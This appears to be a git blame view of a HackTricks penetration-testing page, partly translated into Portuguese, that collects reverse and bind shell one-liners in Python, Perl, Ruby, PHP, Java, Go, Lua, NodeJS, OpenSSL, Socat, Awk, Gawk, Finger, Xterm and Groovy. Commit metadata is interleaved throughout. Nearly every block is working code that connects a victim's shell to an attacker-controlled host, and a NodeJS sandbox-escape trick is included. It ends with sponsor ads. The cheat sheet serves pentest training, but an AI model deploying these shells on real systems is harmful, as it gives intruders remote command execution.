 								python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 								#IPv6
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Perl
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 								perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Ruby
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 								ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## PHP
-												Adjusted PHP reverse shell.

											
										
										
											2022-07-01 18:36:12 +00:00
+								```php
-												Update linux.md
											
										
										
											2022-09-13 16:41:09 +00:00
+								// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
-												Adjusted PHP reverse shell.

											
										
										
											2022-07-01 18:36:12 +00:00
+								// Using this method may lead to instances where the connection reaches out to the listener and then closes.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
-												Adjusted PHP reverse shell.

											
										
										
											2022-07-01 18:36:12 +00:00
 								// Using 'proc_open' makes no assumptions about what the file descriptor will be.
 								// See https://security.stackexchange.com/a/198944 for more information
 								<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
-												GitBook: [master] 5 pages and 12 assets modified
											
										
										
											2021-09-02 21:18:04 +00:00
+								<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Java
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								r = Runtime.getRuntime()
 								p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 								p.waitFor()
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Ncat
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
 								attacker> ncat -v 10.0.0.22 4444 --ssl
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Descubra as vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder monitora sua superfície de ataque, realiza varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 								***
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Lua
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Linux
 								lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 								#Windows & Linux
 								lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## NodeJS
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								(function(){
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								var net = require("net"),
 								cp = require("child_process"),
 								sh = cp.spawn("/bin/sh", []);
 								var client = new net.Socket();
 								client.connect(8080, "10.17.26.64", function(){
 								client.pipe(sh.stdin);
 								sh.stdout.pipe(client);
 								sh.stderr.pipe(client);
 								});
 								return /a/; // Prevents the Node.js application form crashing
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								})();
 								or
 								require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
-												GitBook: [#2836] update

											
										
										
											2021-11-08 23:40:13 +00:00
+								require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								or
 								-var x = global.process.mainModule.require
 								-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
 								or
-												GitBook: [#3225] No subject

											
										
										
											2022-05-29 23:24:32 +00:00
+								// If you get to the constructor of a function you can define and execute another function inside a string
 								"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
 								"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
 								or
 								// Abuse this syntax to get a reverse shell
 								var fs = this.process.binding('fs');
 								var fs = process.binding('fs');
 								or
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 								```
-												Fix typo
											
										
										
											2022-10-17 15:02:34 +00:00
+								## OpenSSL
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								O Atacante (Kali)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
 								openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
 								openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								A Vítima
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Linux
 								openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
 								#Windows
 								openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## **Socat**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								### Shell de Vínculo
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								### Shell Reverso
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
 								victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Awk
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Finger
 								**Atacante**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								while true; do nc -l 79; done
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Para enviar o comando, escreva-o, pressione enter e pressione CTRL+D (para interromper STDIN)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Vítima**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
 								export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Gawk
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#!/usr/bin/gawk -f
 								BEGIN {
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								Port    =       8080
 								Prompt  =       "bkd> "
 								Service = "/inet/tcp/" Port "/0/0"
 								while (1) {
 								do {
 								printf Prompt |& Service
 								Service |& getline cmd
 								if (cmd) {
 								while ((cmd |& getline) > 0)
 								print $0 |& Service
 								close(cmd)
 								}
 								} while (cmd != "exit")
 								close(Service)
 								}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Xterm
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Uma das formas mais simples de reverse shell é uma sessão xterm. O seguinte comando deve ser executado no servidor. Ele tentará se conectar de volta a você (10.0.0.1) na porta TCP 6001.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								xterm -display 10.0.0.1:1
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Para capturar o xterm recebido, inicie um X-Server (:1 – que escuta na porta TCP 6001). Uma maneira de fazer isso é com Xnest (a ser executado no seu sistema):
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								Xnest :1
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Você precisará autorizar o alvo a se conectar com você (comando também executado no seu host):
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								xhost +targetip
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Groovy
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								por [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTA: Java reverse shell também funciona para Groovy
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								String host="localhost";
 								int port=8044;
 								String cmd="cmd.exe";
 								Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								## Bibliografia
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
 								{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
 								{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
 								{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rápido. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
 								{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
 								Outras formas de apoiar o HackTricks:
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
 								* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
 								* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>